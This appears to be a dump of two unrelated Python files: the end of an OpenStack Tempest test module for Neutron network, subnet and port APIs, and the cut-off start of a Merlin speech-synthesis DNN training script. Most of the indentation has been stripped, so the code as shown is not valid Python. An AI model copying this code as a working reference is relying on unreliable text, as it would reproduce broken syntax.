mask_bits = CONF.network.tenant_network_mask_bits
elif ip_version == 6:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
if mask_bits >= cidr.prefixlen:
return netaddr.IPAddress(cidr) + 1
else:
for subnet in cidr.subnet(mask_bits):
return netaddr.IPAddress(subnet) + 1
@classmethod
def _get_allocation_pools_from_gateway(cls, ip_version):
"""Return allocation range for subnet of given gateway"""
gateway = cls._get_gateway_from_tempest_conf(ip_version)
return [{'start': str(gateway + 2), 'end': str(gateway + 3)}]
def subnet_dict(self, include_keys):
"""Return a subnet dict which has include_keys and their corresponding
value from self._subnet_data
"""
return dict((key, self._subnet_data[self._ip_version][key])
for key in include_keys)
def _compare_resource_attrs(self, actual, expected):
exclude_keys = set(actual).symmetric_difference(expected)
self.assertThat(actual, custom_matchers.MatchesDictExceptForKeys(
expected, exclude_keys))
def _delete_network(self, network):
# Deleting network also deletes its subnets if exists
self.client.delete_network(network['id'])
if network in self.networks:
self.networks.remove(network)
for subnet in self.subnets:
if subnet['network_id'] == network['id']:
self.subnets.remove(subnet)
def _create_verify_delete_subnet(self, cidr=None, mask_bits=None,
**kwargs):
network = self.create_network()
net_id = network['id']
gateway = kwargs.pop('gateway', None)
subnet = self.create_subnet(network, gateway, cidr, mask_bits,
**kwargs)
compare_args_full = dict(gateway_ip=gateway, cidr=cidr,
mask_bits=mask_bits, **kwargs)
compare_args = dict((k, v) for k, v in six.iteritems(compare_args_full)
if v is not None)
if 'dns_nameservers' in set(subnet).intersection(compare_args):
self.assertEqual(sorted(compare_args['dns_nameservers']),
sorted(subnet['dns_nameservers']))
del subnet['dns_nameservers'], compare_args['dns_nameservers']
self._compare_resource_attrs(subnet, compare_args)
self.client.delete_network(net_id)
self.networks.pop()
self.subnets.pop()
@test.attr(type='smoke')
@test.idempotent_id('0e269138-0da6-4efc-a46d-578161e7b221')
def test_create_update_delete_network_subnet(self):
# Create a network
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
self.addCleanup(self._delete_network, network)
net_id = network['id']
self.assertEqual('ACTIVE', network['status'])
# Verify network update
new_name = "New_network"
body = self.client.update_network(net_id, name=new_name)
updated_net = body['network']
self.assertEqual(updated_net['name'], new_name)
# Find a cidr that is not in use yet and create a subnet with it
subnet = self.create_subnet(network)
subnet_id = subnet['id']
# Verify subnet update
new_name = "New_subnet"
body = self.client.update_subnet(subnet_id, name=new_name)
updated_subnet = body['subnet']
self.assertEqual(updated_subnet['name'], new_name)
@test.attr(type='smoke')
@test.idempotent_id('2bf13842-c93f-4a69-83ed-717d2ec3b44e')
def test_show_network(self):
# Verify the details of a network
body = self.client.show_network(self.network['id'])
network = body['network']
for key in ['id', 'name', 'mtu']:
self.assertEqual(network[key], self.network[key])
@test.attr(type='smoke')
@test.idempotent_id('867819bb-c4b6-45f7-acf9-90edcf70aa5e')
def test_show_network_fields(self):
# Verify specific fields of a network
fields = ['id', 'name', 'mtu']
body = self.client.show_network(self.network['id'],
fields=fields)
network = body['network']
self.assertEqual(sorted(network.keys()), sorted(fields))
for field_name in fields:
self.assertEqual(network[field_name], self.network[field_name])
@test.attr(type='smoke')
@test.idempotent_id('f7ffdeda-e200-4a7a-bcbe-05716e86bf43')
def test_list_networks(self):
# Verify the network exists in the list of all networks
body = self.client.list_networks()
networks = [network['id'] for network in body['networks']
if network['id'] == self.network['id']]
self.assertNotEmpty(networks, "Created network not found in the list")
@test.attr(type='smoke')
@test.idempotent_id('6ae6d24f-9194-4869-9c85-c313cb20e080')
def test_list_networks_fields(self):
# Verify specific fields of the networks
fields = ['id', 'name', 'mtu']
body = self.client.list_networks(fields=fields)
networks = body['networks']
self.assertNotEmpty(networks, "Network list returned is empty")
for network in networks:
self.assertEqual(sorted(network.keys()), sorted(fields))
@test.attr(type='smoke')
@test.idempotent_id('bd635d81-6030-4dd1-b3b9-31ba0cfdf6cc')
def test_show_subnet(self):
# Verify the details of a subnet
body = self.client.show_subnet(self.subnet['id'])
subnet = body['subnet']
self.assertNotEmpty(subnet, "Subnet returned has no fields")
for key in ['id', 'cidr']:
self.assertIn(key, subnet)
self.assertEqual(subnet[key], self.subnet[key])
@test.attr(type='smoke')
@test.idempotent_id('270fff0b-8bfc-411f-a184-1e8fd35286f0')
def test_show_subnet_fields(self):
# Verify specific fields of a subnet
fields = ['id', 'network_id']
body = self.client.show_subnet(self.subnet['id'],
fields=fields)
subnet = body['subnet']
self.assertEqual(sorted(subnet.keys()), sorted(fields))
for field_name in fields:
self.assertEqual(subnet[field_name], self.subnet[field_name])
@test.attr(type='smoke')
@test.idempotent_id('db68ba48-f4ea-49e9-81d1-e367f6d0b20a')
def test_list_subnets(self):
# Verify the subnet exists in the list of all subnets
body = self.client.list_subnets()
subnets = [subnet['id'] for subnet in body['subnets']
if subnet['id'] == self.subnet['id']]
self.assertNotEmpty(subnets, "Created subnet not found in the list")
@test.attr(type='smoke')
@test.idempotent_id('842589e3-9663-46b0-85e4-7f01273b0412')
def test_list_subnets_fields(self):
# Verify specific fields of subnets
fields = ['id', 'network_id']
body = self.client.list_subnets(fields=fields)
subnets = body['subnets']
self.assertNotEmpty(subnets, "Subnet list returned is empty")
for subnet in subnets:
self.assertEqual(sorted(subnet.keys()), sorted(fields))
def _try_delete_network(self, net_id):
# delete network, if it exists
try:
self.client.delete_network(net_id)
# if network is not found, this means it was deleted in the test
except lib_exc.NotFound:
pass
@test.attr(type='smoke')
@test.idempotent_id('f04f61a9-b7f3-4194-90b2-9bcf660d1bfe')
def test_delete_network_with_subnet(self):
# Creates a network
name = data_utils.rand_name('network-')
body = self.client.create_network(name=name)
network = body['network']
net_id = network['id']
self.addCleanup(self._try_delete_network, net_id)
# Find a cidr that is not in use yet and create a subnet with it
subnet = self.create_subnet(network)
subnet_id = subnet['id']
# Delete network while the subnet still exists
body = self.client.delete_network(net_id)
# Verify that the subnet got automatically deleted.
self.assertRaises(lib_exc.NotFound, self.client.show_subnet,
subnet_id)
# Since create_subnet adds the subnet to the delete list, and it is
# actually deleted here - this would create an issue, hence remove
# it from the list.
self.subnets.pop()
@test.attr(type='smoke')
@test.idempotent_id('d2d596e2-8e76-47a9-ac51-d4648009f4d3')
def test_create_delete_subnet_without_gateway(self):
self._create_verify_delete_subnet()
@test.attr(type='smoke')
@test.idempotent_id('9393b468-186d-496d-aa36-732348cd76e7')
def test_create_delete_subnet_with_gw(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['gateway']))
@test.attr(type='smoke')
@test.idempotent_id('bec949c4-3147-4ba6-af5f-cd2306118404')
def test_create_delete_subnet_with_allocation_pools(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['allocation_pools']))
@test.attr(type='smoke')
@test.idempotent_id('8217a149-0c6c-4cfb-93db-0486f707d13f')
def test_create_delete_subnet_with_gw_and_allocation_pools(self):
self._create_verify_delete_subnet(**self.subnet_dict(
['gateway', 'allocation_pools']))
@test.attr(type='smoke')
@test.idempotent_id('d830de0a-be47-468f-8f02-1fd996118289')
def test_create_delete_subnet_with_host_routes_and_dns_nameservers(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['host_routes', 'dns_nameservers']))
@test.attr(type='smoke')
@test.idempotent_id('94ce038d-ff0a-4a4c-a56b-09da3ca0b55d')
def test_create_delete_subnet_with_dhcp_enabled(self):
self._create_verify_delete_subnet(enable_dhcp=True)
@test.attr(type='smoke')
@test.idempotent_id('3d3852eb-3009-49ec-97ac-5ce83b73010a')
def test_update_subnet_gw_dns_host_routes_dhcp(self):
network = self.create_network()
self.addCleanup(self._delete_network, network)
subnet = self.create_subnet(
network, **self.subnet_dict(['gateway', 'host_routes',
'dns_nameservers',
'allocation_pools']))
subnet_id = subnet['id']
new_gateway = str(netaddr.IPAddress(
self._subnet_data[self._ip_version]['gateway']) + 1)
# Verify subnet update
new_host_routes = self._subnet_data[self._ip_version][
'new_host_routes']
new_dns_nameservers = self._subnet_data[self._ip_version][
'new_dns_nameservers']
kwargs = {'host_routes': new_host_routes,
'dns_nameservers': new_dns_nameservers,
'gateway_ip': new_gateway, 'enable_dhcp': True}
new_name = "New_subnet"
body = self.client.update_subnet(subnet_id, name=new_name,
**kwargs)
updated_subnet = body['subnet']
kwargs['name'] = new_name
self.assertEqual(sorted(updated_subnet['dns_nameservers']),
sorted(kwargs['dns_nameservers']))
del subnet['dns_nameservers'], kwargs['dns_nameservers']
self._compare_resource_attrs(updated_subnet, kwargs)
@test.attr(type='smoke')
@test.idempotent_id('a4d9ec4c-0306-4111-a75c-db01a709030b')
def test_create_delete_subnet_all_attributes(self):
self._create_verify_delete_subnet(
enable_dhcp=True,
**self.subnet_dict(['gateway', 'host_routes', 'dns_nameservers']))
@test.attr(type='smoke')
@test.idempotent_id('af774677-42a9-4e4b-bb58-16fe6a5bc1ec')
def test_external_network_visibility(self):
"""Verifies user can see external networks but not subnets."""
body = self.client.list_networks(**{'router:external': True})
networks = [network['id'] for network in body['networks']]
self.assertNotEmpty(networks, "No external networks found")
nonexternal = [net for net in body['networks'] if
not net['router:external']]
self.assertEmpty(nonexternal, "Found non-external networks"
" in filtered list (%s)." % nonexternal)
self.assertIn(CONF.network.public_network_id, networks)
subnets_iter = (network['subnets'] for network in body['networks'])
# subnets_iter is a list (iterator) of lists. This flattens it to a
# list of UUIDs
public_subnets_iter = itertools.chain(*subnets_iter)
body = self.client.list_subnets()
subnets = [sub['id'] for sub in body['subnets']
if sub['id'] in public_subnets_iter]
self.assertEmpty(subnets, "Public subnets visible")
class BulkNetworkOpsTestJSON(base.BaseNetworkTest):
"""
Tests the following operations in the Neutron API using the REST client for
Neutron:
bulk network creation
bulk subnet creation
bulk port creation
list tenant's networks
v2.0 of the Neutron API is assumed. It is also assumed that the following
options are defined in the [network] section of etc/tempest.conf:
tenant_network_cidr with a block of cidr's from which smaller blocks
can be allocated for tenant networks
tenant_network_mask_bits with the mask bits to be used to partition the
block defined by tenant_network_cidr
"""
def _delete_networks(self, created_networks):
for n in created_networks:
self.client.delete_network(n['id'])
# Asserting that the networks are not found in the list after deletion
body = self.client.list_networks()
networks_list = [network['id'] for network in body['networks']]
for n in created_networks:
self.assertNotIn(n['id'], networks_list)
def _delete_subnets(self, created_subnets):
for n in created_subnets:
self.client.delete_subnet(n['id'])
# Asserting that the subnets are not found in the list after deletion
body = self.client.list_subnets()
subnets_list = [subnet['id'] for subnet in body['subnets']]
for n in created_subnets:
self.assertNotIn(n['id'], subnets_list)
def _delete_ports(self, created_ports):
for n in created_ports:
self.client.delete_port(n['id'])
# Asserting that the ports are not found in the list after deletion
body = self.client.list_ports()
ports_list = [port['id'] for port in body['ports']]
for n in created_ports:
self.assertNotIn(n['id'], ports_list)
@test.attr(type='smoke')
@test.idempotent_id('d4f9024d-1e28-4fc1-a6b1-25dbc6fa11e2')
def test_bulk_create_delete_network(self):
# Creates 2 networks in one request
network_names = [data_utils.rand_name('network-'),
data_utils.rand_name('network-')]
body = self.client.create_bulk_network(network_names)
created_networks = body['networks']
self.addCleanup(self._delete_networks, created_networks)
# Asserting that the networks are found in the list after creation
body = self.client.list_networks()
networks_list = [network['id'] for network in body['networks']]
for n in created_networks:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], networks_list)
@test.attr(type='smoke')
@test.idempotent_id('8936533b-c0aa-4f29-8e53-6cc873aec489')
def test_bulk_create_delete_subnet(self):
networks = [self.create_network(), self.create_network()]
# Creates 2 subnets in one request
if self._ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
else:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
cidrs = [subnet_cidr for subnet_cidr in cidr.subnet(mask_bits)]
names = [data_utils.rand_name('subnet-') for i in range(len(networks))]
subnets_list = []
for i in range(len(names)):
p1 = {
'network_id': networks[i]['id'],
'cidr': str(cidrs[i]),
'name': names[i],
'ip_version': self._ip_version
}
subnets_list.append(p1)
del subnets_list[1]['name']
body = self.client.create_bulk_subnet(subnets_list)
created_subnets = body['subnets']
self.addCleanup(self._delete_subnets, created_subnets)
# Asserting that the subnets are found in the list after creation
body = self.client.list_subnets()
subnets_list = [subnet['id'] for subnet in body['subnets']]
for n in created_subnets:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], subnets_list)
@test.attr(type='smoke')
@test.idempotent_id('48037ff2-e889-4c3b-b86a-8e3f34d2d060')
def test_bulk_create_delete_port(self):
networks = [self.create_network(), self.create_network()]
# Creates 2 ports in one request
names = [data_utils.rand_name('port-') for i in range(len(networks))]
port_list = []
state = [True, False]
for i in range(len(names)):
p1 = {
'network_id': networks[i]['id'],
'name': names[i],
'admin_state_up': state[i],
}
port_list.append(p1)
del port_list[1]['name']
body = self.client.create_bulk_port(port_list)
created_ports = body['ports']
self.addCleanup(self._delete_ports, created_ports)
# Asserting that the ports are found in the list after creation
body = self.client.list_ports()
ports_list = [port['id'] for port in body['ports']]
for n in created_ports:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], ports_list)
class BulkNetworkOpsIpV6TestJSON(BulkNetworkOpsTestJSON):
_ip_version = 6
class NetworksIpV6TestJSON(NetworksTestJSON):
_ip_version = 6
@test.attr(type='smoke')
@test.idempotent_id('e41a4888-65a6-418c-a095-f7c2ef4ad59a')
def test_create_delete_subnet_with_gw(self):
net = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
gateway = str(netaddr.IPAddress(net.first + 2))
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
subnet = self.create_subnet(network, gateway)
# Verifies Subnet GW in IPv6
self.assertEqual(subnet['gateway_ip'], gateway)
@test.attr(type='smoke')
@test.idempotent_id('ebb4fd95-524f-46af-83c1-0305b239338f')
def test_create_delete_subnet_with_default_gw(self):
net = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
gateway_ip = str(netaddr.IPAddress(net.first + 1))
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
subnet = self.create_subnet(network)
# Verifies Subnet GW in IPv6
self.assertEqual(subnet['gateway_ip'], gateway_ip)
@test.attr(type='smoke')
@test.idempotent_id('a9653883-b2a4-469b-8c3c-4518430a7e55')
def test_create_list_subnet_with_no_gw64_one_network(self):
name = data_utils.rand_name('network-')
network = self.create_network(name)
ipv6_gateway = self.subnet_dict(['gateway'])['gateway']
subnet1 = self.create_subnet(network,
ip_version=6,
gateway=ipv6_gateway)
self.assertEqual(netaddr.IPNetwork(subnet1['cidr']).version, 6,
'The created subnet is not IPv6')
subnet2 = self.create_subnet(network,
gateway=None,
ip_version=4)
self.assertEqual(netaddr.IPNetwork(subnet2['cidr']).version, 4,
'The created subnet is not IPv4')
# Verifies Subnet GW is set in IPv6
self.assertEqual(subnet1['gateway_ip'], ipv6_gateway)
# Verifies Subnet GW is None in IPv4
self.assertEqual(subnet2['gateway_ip'], None)
# Verifies all 2 subnets in the same network
body = self.client.list_subnets()
subnets = [sub['id'] for sub in body['subnets']
if sub['network_id'] == network['id']]
test_subnet_ids = [sub['id'] for sub in (subnet1, subnet2)]
self.assertItemsEqual(subnets,
test_subnet_ids,
'Subnets are not in the same network')
class NetworksIpV6TestAttrs(NetworksIpV6TestJSON):
@classmethod
def resource_setup(cls):
if not CONF.network_feature_enabled.ipv6_subnet_attributes:
raise cls.skipException("IPv6 extended attributes for "
"subnets not available")
super(NetworksIpV6TestAttrs, cls).resource_setup()
@test.attr(type='smoke')
@test.idempotent_id('da40cd1b-a833-4354-9a85-cd9b8a3b74ca')
def test_create_delete_subnet_with_v6_attributes_stateful(self):
self._create_verify_delete_subnet(
gateway=self._subnet_data[self._ip_version]['gateway'],
ipv6_ra_mode='dhcpv6-stateful',
ipv6_address_mode='dhcpv6-stateful')
@test.attr(type='smoke')
@test.idempotent_id('176b030f-a923-4040-a755-9dc94329e60c')
def test_create_delete_subnet_with_v6_attributes_slaac(self):
self._create_verify_delete_subnet(
ipv6_ra_mode='slaac',
ipv6_address_mode='slaac')
@test.attr(type='smoke')
@test.idempotent_id('7d410310-8c86-4902-adf9-865d08e31adb')
def test_create_delete_subnet_with_v6_attributes_stateless(self):
self._create_verify_delete_subnet(
ipv6_ra_mode='dhcpv6-stateless',
ipv6_address_mode='dhcpv6-stateless')
def _test_delete_subnet_with_ports(self, mode):
"""Create subnet and delete it with existing ports"""
slaac_network = self.create_network()
subnet_slaac = self.create_subnet(slaac_network,
**{'ipv6_ra_mode': mode,
'ipv6_address_mode': mode})
port = self.create_port(slaac_network)
self.assertIsNotNone(port['fixed_ips'][0]['ip_address'])
self.client.delete_subnet(subnet_slaac['id'])
self.subnets.pop()
subnets = self.client.list_subnets()
subnet_ids = [subnet['id'] for subnet in subnets['subnets']]
self.assertNotIn(subnet_slaac['id'], subnet_ids,
"Subnet wasn't deleted")
self.assertRaisesRegexp(
lib_exc.Conflict,
"There are one or more ports still in use on the network",
self.client.delete_network,
slaac_network['id'])
@test.attr(type='smoke')
@test.idempotent_id('88554555-ebf8-41ef-9300-4926d45e06e9')
def test_create_delete_slaac_subnet_with_ports(self):
"""Test deleting subnet with SLAAC ports
Create subnet with SLAAC, create ports in network
and then you shall be able to delete subnet without port
deletion. But you still can not delete the network.
"""
self._test_delete_subnet_with_ports("slaac")
@test.attr(type='smoke')
@test.idempotent_id('2de6ab5a-fcf0-4144-9813-f91a940291f1')
def test_create_delete_stateless_subnet_with_ports(self):
"""Test deleting subnet with DHCPv6 stateless ports
Create subnet with DHCPv6 stateless, create ports in network
and then you shall be able to delete subnet without port
deletion. But you still can not delete the network.
"""
self._test_delete_subnet_with_ports("dhcpv6-stateless")
| apache-2.0 |
bajibabu/merlin | src/work_in_progress/oliver/run_tpdnn.py | 2 | 101142 |
import pickle
import gzip
import os, sys, errno
import time
import math
# numpy & theano imports need to be done in this order (only for some numpy installations, not sure why)
import numpy
# we need to explicitly import this in some cases, not sure why this doesn't get imported with numpy itself
import numpy.distutils.__config__
# and only after that can we import theano
import theano
from utils.providers import ListDataProviderWithProjectionIndex, expand_projection_inputs, get_unexpanded_projection_inputs # ListDataProvider
from frontend.label_normalisation import HTSLabelNormalisation, XMLLabelNormalisation
from frontend.silence_remover import SilenceRemover
from frontend.silence_remover import trim_silence
from frontend.min_max_norm import MinMaxNormalisation
#from frontend.acoustic_normalisation import CMPNormalisation
from frontend.acoustic_composition import AcousticComposition
from frontend.parameter_generation import ParameterGeneration
#from frontend.feature_normalisation_base import FeatureNormBase
from frontend.mean_variance_norm import MeanVarianceNorm
# the new class for label composition and normalisation
from frontend.label_composer import LabelComposer
import configuration
from models.dnn import DNN
from models.tpdnn import TokenProjectionDNN
from models.ms_dnn import MultiStreamDNN
from models.ms_dnn_gv import MultiStreamDNNGv
from models.sdae import StackedDenoiseAutoEncoder
from utils.compute_distortion import DistortionComputation, IndividualDistortionComp
from utils.generate import generate_wav
from utils.learn_rates import ExpDecreaseLearningRate
#import matplotlib.pyplot as plt
# our custom logging class that can also plot
#from logplot.logging_plotting import LoggerPlotter, MultipleTimeSeriesPlot, SingleWeightMatrixPlot
from logplot.logging_plotting import LoggerPlotter, MultipleSeriesPlot, SingleWeightMatrixPlot
import logging # as logging
import logging.config
import io
## This should always be True -- tidy up later
expand_by_minibatch = True
if expand_by_minibatch:
proj_type = 'int32'
else:
proj_type = theano.config.floatX
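## A minimal sketch (not part of the original pipeline) of what expanding
## projection indexes into one-hot rows means when expand_by_minibatch is
## False; the helper name is hypothetical and purely illustrative.
def _example_expand_indexes_to_onehot(indexes, projection_insize):
    ## indexes: 1-D integer array holding one token id per frame
    onehot = numpy.zeros((len(indexes), projection_insize), dtype=theano.config.floatX)
    onehot[numpy.arange(len(indexes)), indexes] = 1.0
    return onehot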
def extract_file_id_list(file_list):
file_id_list = []
for file_name in file_list:
file_id = os.path.basename(os.path.splitext(file_name)[0])
file_id_list.append(file_id)
return file_id_list
def read_file_list(file_name):
logger = logging.getLogger("read_file_list")
file_lists = []
fid = open(file_name)
for line in fid.readlines():
line = line.strip()
if len(line) < 1:
continue
file_lists.append(line)
fid.close()
logger.debug('Read file list from %s' % file_name)
return file_lists
def make_output_file_list(out_dir, in_file_lists):
out_file_lists = []
for in_file_name in in_file_lists:
file_id = os.path.basename(in_file_name)
out_file_name = out_dir + '/' + file_id
out_file_lists.append(out_file_name)
return out_file_lists
def prepare_file_path_list(file_id_list, file_dir, file_extension, new_dir_switch=True):
if not os.path.exists(file_dir) and new_dir_switch:
os.makedirs(file_dir)
file_name_list = []
for file_id in file_id_list:
file_name = file_dir + '/' + file_id + file_extension
file_name_list.append(file_name)
return file_name_list
def visualize_dnn(dnn):
layer_num = len(dnn.params) // 2 ## including input and output
for i in range(layer_num):
fig_name = 'Activation weights W' + str(i)
fig_title = 'Activation weights of W' + str(i)
xlabel = 'Neuron index of hidden layer ' + str(i)
ylabel = 'Neuron index of hidden layer ' + str(i+1)
if i == 0:
xlabel = 'Input feature index'
if i == layer_num-1:
ylabel = 'Output feature index'
logger.create_plot(fig_name, SingleWeightMatrixPlot)
plotlogger.add_plot_point(fig_name, fig_name, dnn.params[i*2].get_value(borrow=True).T)
plotlogger.save_plot(fig_name, title=fig_name, xlabel=xlabel, ylabel=ylabel)
## Function for training projection and non-projection parts at the same time
def train_DNN(train_xy_file_list, valid_xy_file_list, \
nnets_file_name, n_ins, n_outs, ms_outs, hyper_params, buffer_size, plot=False):
# get loggers for this function
# this one writes to both console and file
logger = logging.getLogger("main.train_DNN")
logger.debug('Starting train_DNN')
if plot:
# this one takes care of plotting duties
plotlogger = logging.getLogger("plotting")
# create an (empty) plot of training convergence, ready to receive data points
logger.create_plot('training convergence',MultipleSeriesPlot)
try:
assert numpy.sum(ms_outs) == n_outs
except AssertionError:
logger.critical('the summation of multi-stream outputs does not equal %d' %(n_outs))
raise
####parameters#####
finetune_lr = float(hyper_params['learning_rate'])
training_epochs = int(hyper_params['training_epochs'])
batch_size = int(hyper_params['batch_size'])
l1_reg = float(hyper_params['l1_reg'])
l2_reg = float(hyper_params['l2_reg'])
private_l2_reg = float(hyper_params['private_l2_reg'])
warmup_epoch = int(hyper_params['warmup_epoch'])
momentum = float(hyper_params['momentum'])
warmup_momentum = float(hyper_params['warmup_momentum'])
hidden_layers_sizes = hyper_params['hidden_layers_sizes']
stream_weights = hyper_params['stream_weights']
private_hidden_sizes = hyper_params['private_hidden_sizes']
buffer_utt_size = buffer_size
early_stop_epoch = int(hyper_params['early_stop_epochs'])
hidden_activation = hyper_params['hidden_activation']
output_activation = hyper_params['output_activation']
stream_lr_weights = hyper_params['stream_lr_weights']
use_private_hidden = hyper_params['use_private_hidden']
model_type = hyper_params['model_type']
index_to_project = hyper_params['index_to_project']
projection_insize = hyper_params['projection_insize']
projection_outsize = hyper_params['projection_outsize']
## use a switch to turn on pretraining
## pretraining may not help much; if that is the case, we turn it off to save time
do_pretraining = hyper_params['do_pretraining']
pretraining_epochs = int(hyper_params['pretraining_epochs'])
pretraining_lr = float(hyper_params['pretraining_lr'])
initial_projection_distrib = hyper_params['initial_projection_distrib']
buffer_size = int(buffer_size / batch_size) * batch_size
###################
(train_x_file_list, train_y_file_list) = train_xy_file_list
(valid_x_file_list, valid_y_file_list) = valid_xy_file_list
logger.debug('Creating training data provider')
train_data_reader = ListDataProviderWithProjectionIndex(x_file_list = train_x_file_list, y_file_list = train_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = True, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
logger.debug('Creating validation data provider')
valid_data_reader = ListDataProviderWithProjectionIndex(x_file_list = valid_x_file_list, y_file_list = valid_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = False, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x, train_set_x_proj, train_set_y = shared_train_set_xy
shared_valid_set_xy, temp_valid_set_x, temp_valid_set_x_proj, temp_valid_set_y = valid_data_reader.load_next_partition_with_projection()
valid_set_x, valid_set_x_proj, valid_set_y = shared_valid_set_xy
train_data_reader.reset()
valid_data_reader.reset()
##temporarily we use the training set as pretrain_set_x.
##we need to support arbitrary data for pretraining
pretrain_set_x = train_set_x
# numpy random generator
numpy_rng = numpy.random.RandomState(123)
logger.info('building the model')
dnn_model = None
pretrain_fn = None ## not all the model support pretraining right now
train_fn = None
valid_fn = None
valid_model = None ## valid_fn and valid_model are the same. reserved to compute multi-stream distortion
if model_type == 'DNN':
dnn_model = DNN(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y), batch_size=batch_size)
elif model_type == 'TPDNN':
dnn_model = TokenProjectionDNN(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
hidden_activation = hidden_activation,
output_activation = output_activation,
projection_insize=projection_insize, projection_outsize=projection_outsize,
expand_by_minibatch=expand_by_minibatch, initial_projection_distrib=initial_projection_distrib)
train_all_fn, train_subword_fn, train_word_fn, infer_projections_fn, valid_fn, valid_score_i = \
dnn_model.build_finetune_functions(
(train_set_x, train_set_x_proj, train_set_y),
(valid_set_x, valid_set_x_proj, valid_set_y), batch_size=batch_size)
elif model_type == 'SDAE':
##basic model is ready.
##if the corruption level is set to zero, it becomes a normal autoencoder
dnn_model = StackedDenoiseAutoEncoder(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes)
if do_pretraining:
pretraining_fn = dnn_model.pretraining_functions(pretrain_set_x, batch_size)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y), batch_size=batch_size)
elif model_type == 'MSDNN': ##model is ready, but the hyper-parameters are not optimised.
dnn_model = MultiStreamDNN(numpy_rng=numpy_rng, n_ins=n_ins, ms_outs=ms_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
stream_weights = stream_weights,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y),
batch_size=batch_size, lr_weights = stream_lr_weights)
elif model_type == 'MSDNN_GV': ## not fully ready
dnn_model = MultiStreamDNNGv(numpy_rng=numpy_rng, n_ins=n_ins, ms_outs=ms_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
stream_weights = stream_weights,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y),
batch_size=batch_size, lr_weights = stream_lr_weights)
else:
logger.critical('%s type NN model is not supported!' %(model_type))
raise
## if pretraining is supported in one model, add the switch here
## be careful to use autoencoder for pretraining here:
## for SDAE, currently only sigmoid function is supported in the hidden layers, as our input is scaled to [0, 1]
## however, tanh works better and converge fast in finetuning
##
## Will extend this soon...
if do_pretraining and model_type == 'SDAE':
logger.info('pretraining the %s model' %(model_type))
corruption_level = 0.0
## in SDAE we do layer-wise pretraining using autoencoders
for i in range(dnn_model.n_layers):
for epoch in range(pretraining_epochs):
sub_start_time = time.clock()
pretrain_loss = []
while (not train_data_reader.is_finish()):
shared_train_set_xy, temp_train_set_x, temp_train_set_y = train_data_reader.load_next_partition()
pretrain_set_x.set_value(numpy.asarray(temp_train_set_x, dtype=theano.config.floatX), borrow=True)
n_train_batches = pretrain_set_x.get_value().shape[0] // batch_size
for batch_index in range(n_train_batches):
pretrain_loss.append(pretraining_fn[i](index=batch_index,
corruption=corruption_level,
learning_rate=pretraining_lr))
sub_end_time = time.clock()
logger.info('Pre-training layer %i, epoch %d, cost %s, time spent %.2f' % (i+1, epoch+1, numpy.mean(pretrain_loss), (sub_end_time - sub_start_time)))
train_data_reader.reset()
logger.info('fine-tuning the %s model' %(model_type))
start_time = time.clock()
best_dnn_model = dnn_model
best_validation_loss = sys.float_info.max
previous_loss = sys.float_info.max
early_stop = 0
epoch = 0
previous_finetune_lr = finetune_lr
while (epoch < training_epochs):
epoch = epoch + 1
current_momentum = momentum
current_finetune_lr = finetune_lr
if epoch <= warmup_epoch:
current_finetune_lr = finetune_lr
current_momentum = warmup_momentum
else:
current_finetune_lr = previous_finetune_lr * 0.5
previous_finetune_lr = current_finetune_lr
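## e.g. with finetune_lr = 0.002 and warmup_epoch = 10 (hypothetical values),
## epochs 1-10 train at 0.002 with warmup_momentum, after which the rate
## halves every epoch: 0.001, 0.0005, 0.00025, ...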
train_error = []
sub_start_time = time.clock()
while (not train_data_reader.is_finish()):
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x.set_value(numpy.asarray(temp_train_set_x, dtype=theano.config.floatX), borrow=True)
train_set_x_proj.set_value(numpy.asarray(temp_train_set_x_proj, dtype=proj_type), borrow=True)
train_set_y.set_value(numpy.asarray(temp_train_set_y, dtype=theano.config.floatX), borrow=True)
n_train_batches = train_set_x.get_value().shape[0] // batch_size
